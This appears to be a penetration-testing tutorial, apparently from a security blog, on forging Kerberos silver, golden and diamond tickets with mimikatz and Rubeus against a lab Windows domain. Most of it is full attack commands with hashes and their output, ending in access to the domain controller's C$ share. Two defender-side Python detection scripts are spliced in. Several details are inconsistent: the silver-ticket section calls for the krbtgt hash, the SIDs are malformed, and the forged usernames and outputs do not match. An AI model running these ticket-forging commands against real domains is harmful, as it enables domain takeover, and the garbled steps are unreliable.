Principle: silver ticket
In step 5 of Kerberos authentication, the client presents the ST together with Authenticator-3 to request a service on the server. After the server receives the client's request, it decrypts the ST with its own key, obtains the session key, and uses that session key to verify the client's identity; if verification succeeds, the client can access the specified service on the server.
A silver ticket forges the TGS (service) ticket and does not need to interact with the domain controller. A silver ticket uses the hash of the service to be accessed, not the krbtgt hash. Note that a forged silver ticket does not carry a PAC signed by the KDC, so if the target host is configured to validate the KDC PAC signature, the silver ticket will not work. A silver ticket can only access the specified service.
The krbtgt hash needs to be exported:
mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"
Find the SID:
whoami /user
The domain name is needed:
net config workstation
Preparation
1. Domain name: nami.com
2. Domain SID: S-1-5-21-1332701932-261370409-2888687086-500
3. Target server name: WIN-A7DM9L6CVHH.nami.com
4. Exploitable service: cifs
5. NTLM hash of the service account: a6f9a989c9fad5637b1e1e941286da19
6. Username to forge: testa
mimikatz.exe "kerberos::golden /domain:nami.com /sid:S-1-5-21-1332701932-261370409-2888687086 /target:WIN-A7DM9L6CVHH.nami.com /service:cifs /rc4:a6f9a989c9fad5637b1e1e941286da19 /user:testa /ptt" "exit"
mimikatz output:
  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /domain:nami.com /sid:S-1-5-21-1332701932-261370409-2888687086 /target:WIN-A7DM9L6CVHH.nami.com /service:cifs /rc4:a6f9a989c9fad5637b1e1e941286da19 /user:testa /ptt
User      : testa
Domain    : nami.com (NAMI)
SID       : S-1-5-21-1332701932-261370409-2888687086
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: a6f9a989c9fad5637b1e1e941286da19 - rc4_hmac_nt
Service   : cifs
Target    : WIN-A7DM9L6CVHH.nami.com
Lifetime  : 2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/7 19:27:16
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'testa @ nami.com' successfully submitted for current session

mimikatz(commandline) # exit
Bye!
View the tickets:
Rubeus.exe klist

Action: List Kerberos Tickets (Current User)

[*] Current LUID    : 0x67e95

  UserName                 : win7
  Domain                   : NAMI0
  LogonId                  : 0x67e95
  UserSID                  : S-1-5-21-1332701932-261370409-2888687086-1602
  AuthenticationPackage    : Kerberos
  LogonType                : Interactive
  LogonTime                : 2022/7/9 18:51:29
  LogonServer              : WIN-A7DM9L6CVHH
  LogonServerDNSDomain     : NAMI.COM
  UserPrincipalName        : win7@nami.com

    [0] - 0x17 - rc4_hmac
      Start/End/MaxRenew: 2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/7 19:27:16
      Server Name       : cifs/WIN-A7DM9L6CVHH.nami.com @ nami.com
      Client Name       : testa @ nami.com
      Flags             : pre_authent, renewable, forwardable (40a00000)
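From the defender's side, the forged ticket above stands out in the klist output by its ten-year validity window and its RC4 etype, both outside the default domain policy. The following Python is an added example (not from the original post and not Rubeus or mimikatz code): it parses a Rubeus klist block and flags tickets whose lifetime, renewal window or etype break the expected policy. The sample block is constructed from the page's own output, and the 10 h / 7 day thresholds are assumptions matching the Kerberos policy defaults.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the two service tickets from the page's Rubeus klist output
# (the mimikatz-forged silver ticket and a legitimately issued one).
SAMPLE_KLIST = """\
  [0] - 0x17 - rc4_hmac
    Start/End/MaxRenew: 2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/7 19:27:16
    Server Name       : cifs/WIN-A7DM9L6CVHH.nami.com @ nami.com
    Client Name       : testa @ nami.com

  [1] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2022/7/10 20:12:42 ; 2022/7/11 6:12:42 ; 2022/7/17 20:12:42
    Server Name       : cifs/WIN-A7DM9L6CVHH.nami.com @ NAMI.COM
    Client Name       : Administrator @ nami.com
"""

# One match per ticket entry; the field labels follow Rubeus' klist layout.
TICKET_RE = re.compile(
    r"\[\d+\] - (?P<etype>0x[0-9a-f]+) - \S+\s+"
    r"Start/End/MaxRenew:\s*(?P<start>[^;]+);\s*(?P<end>[^;]+);\s*(?P<renew>\S+ \S+)\s+"
    r"Server Name\s*:\s*(?P<server>.+?)\s+Client Name\s*:\s*(?P<client>.+?)\s*$",
    re.MULTILINE,
)

def _ts(s):
    return datetime.strptime(s.strip(), "%Y/%m/%d %H:%M:%S")

def parse_klist(text):
    """Return one dict per cached ticket: etype, validity window, server and client principals."""
    return [{"etype": int(m["etype"], 16), "start": _ts(m["start"]), "end": _ts(m["end"]),
             "renew": _ts(m["renew"]), "server": m["server"].strip(),
             "client": m["client"].strip()} for m in TICKET_RE.finditer(text)]

RC4_HMAC = 0x17  # etype of a ticket built from an NTLM hash (mimikatz /rc4)

def flag_tickets(tickets, max_life=timedelta(hours=10), max_renew=timedelta(days=7)):
    """Return (client, server, reason) for each ticket outside the assumed domain policy
    (10 h service-ticket lifetime, 7 day renewal) or still using RC4 in an AES domain."""
    findings = []
    for t in tickets:
        if t["end"] - t["start"] > max_life:
            findings.append((t["client"], t["server"], "lifetime exceeds policy"))
        if t["renew"] - t["start"] > max_renew:
            findings.append((t["client"], t["server"], "renew window exceeds policy"))
        if t["etype"] == RC4_HMAC:
            findings.append((t["client"], t["server"], "rc4 etype"))
    return findings

if __name__ == "__main__":
    for finding in flag_tickets(parse_klist(SAMPLE_KLIST)):
        print(finding)
```

The same checks apply to the golden-ticket TGT shown later on the page (krbtgt service, ten-year window); only the policy thresholds need to match the domain's actual Kerberos settings.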
Access the cifs service on the DC:
C:\Users\win7.NAMI0>dir \\WIN-A7DM9L6CVHH.nami.com\c$
 驱动器 \\WIN-A7DM9L6CVHH.nami.com\c$ 中的卷没有标签。
 卷的序列号是 1EDD-1C0F

2022/03/22  22:20         1,345,536 msf.exe
2016/07/16  21:23    <DIR>          PerfLogs
2022/03/22  21:05    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2022/03/22  23:06             7,168 shell3.exe
2022/03/22  21:03    <DIR>          Users
2022/03/22  23:35    <DIR>          Windows
               2 个文件      1,352,704 字节
               5 个目录 51,494,420,480 可用字节
After running Rubeus.exe purge the tickets are cleared:
Rubeus.exe purge

[*] Action: Purge Tickets
Luid: 0x0

[+] Tickets successfully purged!

C:\Users\win7.NAMI0\Desktop>dir \\WIN-A7DM9L6CVHH.nami.com\c$
Principle: golden ticket
A golden ticket forges the TGT, which belongs to step 3 of Kerberos authentication. After authentication succeeds, the AS encrypts the TGT with the krbtgt hash and returns it to the client. If the password hash of the krbtgt user is known, a TGT for any user can be forged directly, so no AS_REQ/AS_REP communication with the domain controller takes place at all.
Preparation
1. Domain name: nami.com
2. Domain SID: S-1-5-21-1332701932-261370409-2888687086-502
3. Hash of the domain KRBTGT account: 5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37
4. Username to forge: testb
Run the mimikatz command to create the golden ticket:
mimikatz.exe "kerberos::golden /user:Administrator /domain:nami.com /sid:S-1-5-21-1332701932-261370409-2888687086 /aes256:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37 /ticket:Administrator.kiribi" "exit"
mimikatz output:
mimikatz(commandline) # kerberos::ptt Administrator.kiribi

* File: 'Administrator.kiribi': OK

mimikatz(commandline) # exit
Bye!
Import the ticket:
mimikatz.exe "kerberos::ptt Administrator.kiribi" "exit"
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.1
Action: List Kerberos Tickets (Current User)

[*] Current LUID    : 0x67e95

  UserName                 : win7
  Domain                   : NAMI0
  LogonId                  : 0x67e95
  UserSID                  : S-1-5-21-1332701932-261370409-2888687086-1602
  AuthenticationPackage    : Kerberos
  LogonType                : Interactive
  LogonTime                : 2022/7/9 18:51:29
  LogonServer              : WIN-A7DM9L6CVHH
  LogonServerDNSDomain     : NAMI.COM
  UserPrincipalName        : win7@nami.com

    [0] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 2022/7/10 20:12:25 ; 2032/7/7 20:12:25 ; 2032/7/7 20:12:25
      Server Name       : krbtgt/nami.com @ nami.com
      Client Name       : Administrator @ nami.com
      Flags             : pre_authent, initial, renewable, forwardable (40e00000)

    [1] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 2022/7/10 20:12:42 ; 2022/7/11 6:12:42 ; 2022/7/17 20:12:42
      Server Name       : cifs/WIN-A7DM9L6CVHH.nami.com @ NAMI.COM
      Client Name       : Administrator @ nami.com
      Flags             : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
dir \\WIN-A7DM9L6CVHH.nami.com\c$

C:\Users\win7.NAMI0>dir \\WIN-A7DM9L6CVHH.nami.com\c$
 驱动器 \\WIN-A7DM9L6CVHH.nami.com\c$ 中的卷没有标签。
 卷的序列号是 1EDD-1C0F

2022/03/22  22:20         1,345,536 msf.exe
2016/07/16  21:23    <DIR>          PerfLogs
2022/03/22  21:05    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2022/03/22  23:06             7,168 shell3.exe
2022/03/22  21:03    <DIR>          Users
2022/03/22  23:35    <DIR>          Windows
               2 个文件      1,352,704 字节
               5 个目录 51,494,420,480 可用字节
Principle: diamond ticket
Both golden tickets and diamond tickets require the krbtgt key. A golden ticket attack forges a TGT from scratch, whereas a diamond ticket attack takes a genuine TGT requested from the domain controller, decrypts it, modifies its PAC and re-encrypts it.
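Because the diamond ticket starts from a real TGT, the DC does log an AS-REQ, but for the requesting account (win7), not for the user written into the modified PAC (thor). The following Python is an added example (not from the original post or the Rubeus project) of the correlation a detection engineer would run over DC security events: every 4769 (service ticket request) for an account must be preceded by a 4768 (TGT issued) to that same account from the same client. The event list, the client IP 10.0.20.20 and the 10 h window are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample of domain-controller security events, reduced to the fields a SIEM
# would pull from EventData. win7 obtains a TGT (4768) and then a service ticket (4769);
# "thor" then presents a TGT to the TGS although the DC never issued one to that account,
# which is how a diamond ticket built with /ticketuser:thor (or a golden ticket) appears
# in the DC's own logs.
EVENTS = [
    {"id": 4768, "t": "2022-07-10 18:09:02", "user": "win7", "ip": "10.0.20.20",
     "sid": "S-1-5-21-1332701932-261370409-2888687086-1602", "etype": "0x12"},
    {"id": 4769, "t": "2022-07-10 18:09:40", "user": "win7@NAMI.COM", "ip": "10.0.20.20",
     "service": "cifs/WIN-A7DM9L6CVHH.nami.com", "etype": "0x12"},
    {"id": 4769, "t": "2022-07-10 18:12:05", "user": "thor@NAMI.COM", "ip": "10.0.20.20",
     "service": "cifs/WIN-A7DM9L6CVHH.nami.com", "etype": "0x12"},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def _account(name):
    # 4768 logs the bare sAMAccountName, 4769 logs user@REALM; normalise both forms.
    return name.split("@")[0].lower()

def orphan_service_tickets(events, window=timedelta(hours=10)):
    """Return the 4769 events whose account has no 4768 from the same client IP within
    the preceding TGT lifetime (10 h under default policy). A client must be issued a
    TGT before it can ask the TGS for a service ticket; a TGT forged from scratch, or a
    real one re-encrypted for another user, never produces that 4768."""
    tgt_times = {}
    for e in events:
        if e["id"] == 4768:
            tgt_times.setdefault((_account(e["user"]), e["ip"]), []).append(_ts(e["t"]))
    orphans = []
    for e in events:
        if e["id"] != 4769:
            continue
        when = _ts(e["t"])
        issued = tgt_times.get((_account(e["user"]), e["ip"]), [])
        if not any(when - window <= t <= when for t in issued):
            orphans.append(e)
    return orphans

if __name__ == "__main__":
    for e in orphan_service_tickets(EVENTS):
        print(f'{e["t"]} {e["user"]} -> {e["service"]} (no TGT issued to this account)')
```

The check only holds when the logs of every DC in the domain are aggregated, since the TGT may have been issued by a different DC than the one that logged the 4769; TGT renewals (4770) should be treated like issuance as well.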
Preparation
1. The domain's krbtgt hash
2. The username and password of a current domain user
3. The domain name
4. The domain controller's name
Assume the krbtgt hash has already been obtained:
krbtgt: 5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37
Create a diamond TGT using the domain user's username and password:
Rubeus.exe diamond /krbkey:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37 /user:win7 /password:[email protected] /enctype:aes /domain:nami.com /dc:WIN-A7DM9L6CVHH.nami.com /ticketuser:thor /ticketuserid:1104 /groups:512
Output:
[*] Action: Diamond Ticket

[*] Using domain controller: WIN-A7DM9L6CVHH.nami.com (10.0.20.16)
[!] Pre-Authentication required!
[!] AES256 Salt: NAMI.COMwin7
[*] Using aes256_cts_hmac_sha1 hash: 052F11E5B96B8E8699FF99E32E6BF2A4005C8B31FDD67DD88F8F9F08EBD65F02
[*] Building AS-REQ (w/ preauth) for: 'nami.com\win7'
[*] Using domain controller: 10.0.20.16:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
[*] base64(ticket.kirbi):
Create a diamond TGT using the tgtdeleg trick:
C:\Rubeus>Rubeus.exe diamond /krbkey:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37 /tgtdeleg /ticketuser:thor /ticketuserid:1104 /groups:512
Output:
[*] Action: Diamond Ticket

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/WIN-A7DM9L6CVHH.nami.com'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: BzaMDaTaD6S9eF3ZYpZznQGqHim4GrZNG3N/1zyaubA=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
[*] base64(ticket.kirbi):
Import the ticket with ptt:
Rubeus.exe ptt /ticket:<base64 ticket.kirbi from the previous step>
Output:
Action: List Kerberos Tickets (Current User)

[*] Current LUID    : 0x67e95

  UserName                 : win7
  Domain                   : NAMI0
  LogonId                  : 0x67e95
  UserSID                  : S-1-5-21-1332701932-261370409-2888687086-1602
  AuthenticationPackage    : Kerberos
  LogonType                : Interactive
  LogonTime                : 2022/7/9 18:51:29
  LogonServer              : WIN-A7DM9L6CVHH
  LogonServerDNSDomain     : NAMI.COM
  UserPrincipalName        : win7@nami.com

    [0] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 2022/7/10 18:09:02 ; 2022/7/11 4:09:02 ; 2022/7/17 18:09:02
      Server Name       : krbtgt/NAMI.COM @ NAMI.COM
      Client Name       : thor @ NAMI.COM
      Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
View the tickets:
Action: List Kerberos Tickets (Current User)

[*] Current LUID    : 0x67e95

  UserName                 : win7
  Domain                   : NAMI0
  LogonId                  : 0x67e95
  UserSID                  : S-1-5-21-1332701932-261370409-2888687086-1602
  AuthenticationPackage    : Kerberos
  LogonType                : Interactive
  LogonTime                : 2022/7/9 18:51:29
  LogonServer              : WIN-A7DM9L6CVHH
  LogonServerDNSDomain     : NAMI.COM
  UserPrincipalName        : win7@nami.com

    [0] - 0x12 - aes256_cts_hmac_sha1
      Start/End/MaxRenew: 2022/7/10 18:09:02 ; 2022/7/11 4:09:02 ; 2022/7/17 18:09:02
      Server Name       : krbtgt/NAMI.COM @ NAMI.COM
      Client Name       : thor @ NAMI.COM
      Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
Access the domain controller again:
C:\Users\win7.NAMI0>dir \\WIN-A7DM9L6CVHH.nami.com\c$
 驱动器 \\WIN-A7DM9L6CVHH.nami.com\c$ 中的卷没有标签。
 卷的序列号是 1EDD-1C0F

2022/03/22  22:20         1,345,536 msf.exe
2016/07/16  21:23    <DIR>          PerfLogs
2022/03/22  21:05    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2022/03/22  23:06             7,168 shell3.exe
2022/03/22  21:03    <DIR>          Users
2022/03/22  23:35    <DIR>          Windows
               2 个文件      1,352,704 字节
               5 个目录 51,494,420,480 可用字节
Clear the tickets:
C:\Users\win7.NAMI0\Desktop>Rubeus.exe klist
Action: List Kerberos Tickets (Current User)

[*] Current LUID    : 0x67e95

Access the domain controller again:
C:\Users\win7.NAMI0>dir \\WIN-A7DM9L6CVHH.nami.com\c$
拒绝访问。
This public account regularly publishes security articles; follow it to find them easily next time.
Penetration testing training
For penetration testing training, contact 暗月 (Anyue).